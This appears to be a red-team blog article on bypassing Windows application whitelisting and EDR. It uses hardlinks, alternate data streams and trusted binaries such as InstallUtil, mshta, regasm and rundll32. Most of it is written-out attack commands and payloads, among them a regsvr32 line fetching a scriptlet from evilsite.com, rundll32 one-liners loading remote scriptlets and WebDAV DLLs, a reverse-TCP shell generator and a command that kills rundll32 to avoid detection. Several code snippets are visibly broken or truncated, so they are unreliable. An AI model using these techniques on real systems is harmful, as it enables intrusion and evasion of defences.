handy techniques to bypass environment restrictions

through a red teaming assessment you may face some of the restrictions due to policy enforcement / EDR / app whitelisting ..etc., so in this article, I am going to cover most of the techniques that may be useful to bypass environment restrictions

abusing writable paths

on some of the windows ten builds there are some writable folders paths that could be harmed by changing the ownership (ACL) of the desired location which includes executing rights If binary denies executing is inherit you can either disable inheritance, or you can use the hard link to a binary

fsutil hardlink create c:\windows\system32\fxstmp\evil.exe c:\myfolder\linked.exe 

mklink /h c:\windows\system32\fxstmp\evil.exe c:\myfolder\linked.exe

also, I highly recommend checking for writable folders with the current level of permission using the 0xsp mongoose -W option

Bypass Applications Whitelisting

Alternative Data Streams App Locker

after installation of the app locker on a windows machine the first login user will be able to access these files’ locations as below with full access

Code language: CSS (css)

abusing these files could be done using alternative data stream execution since the app locker locks these files. so you may need to execute the following instructions

  • adding binary into the stream
type evilfile.exe > C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exeCode language: CSS (css)
  • calling wait to call the process
wmic process call create 'C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe

you may also consider the following list of commands with the same scope of attack methodology

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o

powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"

curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe

cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns
Code language: JavaScript (javascript)

Installutil.exe (T1118)

 a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe

we can use this technique to generate C# shellcode with this tool, then we can upload the generated file into the target machine

python InstallUtil.py --cs_file temp.cs --exe_file temp.exe --payload windows/shell_reverse_tcp --lhost --lport 443

compile C# code using cs.exe

csc.exe temp.csCode language: CSS (css)

finally, you can execute the payload with the following command

.\InstallUtil.exe /logfile= /LogToConsole=false /U temp.csCode language: JavaScript (javascript)

Presentationhost.exe (T1218)

The presentation host is a built-in windows executable that used as Proxy execution of code through XAML Browser Application, by loading xbap file into a specific process. opening a .xbap file appears to launch the application inside Internet Explorer, but the code is running in another process (Presentationhost.exe) for POC demonstration you may use the following code

private void Button_click(object sender, RoutedEventArgs e)
    if (RadioButton1.IsChecked == true)
}Code language: JavaScript (javascript)

then you can execute the following payload

Presentationhost.exe file:///tmp/poc.xbapCode language: JavaScript (javascript)

also put into consideration that in case it doesn’t work due to security validation it is better to do it through visual studio you can check out this article

Regsvcs.exe / Regasm (T1121)

Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies.

demonstration of this attack by executing the following commands

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}Code language: PHP (php)

you may also achieve that by executing some of the PowerShell command lines

$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content $env:Temp\key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library /keyfile:$env:Temp\key.snk #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{output_file}Code language: PHP (php)

Mshta.exe (T1170)

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications).

from different aspects we can use this utility to launch a different kind of attacks that could bypass restrictions made into an environment, the first common one is by using scriptlet file .sct

let us first generate our payload to use

<?XML version="1.0"?>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>

    <method name="Exec"></method>

<script language="JScript">
    function Exec() {
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
</scriptletCode language: HTML, XML (xml)

then save it as payload.sct for an example, after that you can simply call it through mshta process

 mshta.exe javascript:a=(GetObject("script:")).Exec();close();Code language: JavaScript (javascript)


as well known this can be used differently, the first command is using DLL with slandered UNC path, but in this case, we are using rundll32 to execute a payload stored in WebDAV server

rundll32 \\webdavserver\folder\payload.dll,entrypointCode language: CSS (css)

the other payload is by calling inline-script also using payload.sct that we used before

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();Code language: JavaScript (javascript)

we can also consider using this tricky payload to execute a process and then killing the rundll32.exe process after final execution, that’s very helpful to avoid detection in some cases

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}Code language: JavaScript (javascript)

while on the other hand we still can use rundll32 to bypass the restriction by creating a process depending on the registered system DLLs entry points

rundll32.exe advpack.dll,RegisterOCX calc.exe

rundll32.exe zipfldr.dll,RouteTheCall calc.exe

rundll32.exe url.dll,OpenURL "C:\test\calc.hta"

rundll32.exe url.dll, FileProtocolHandler calc.exe

rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"

rundll32.exe ieadvpack.dll,LaunchINFSection test.iCode language: CSS (css)
Please follow and like us:

Leave a Comment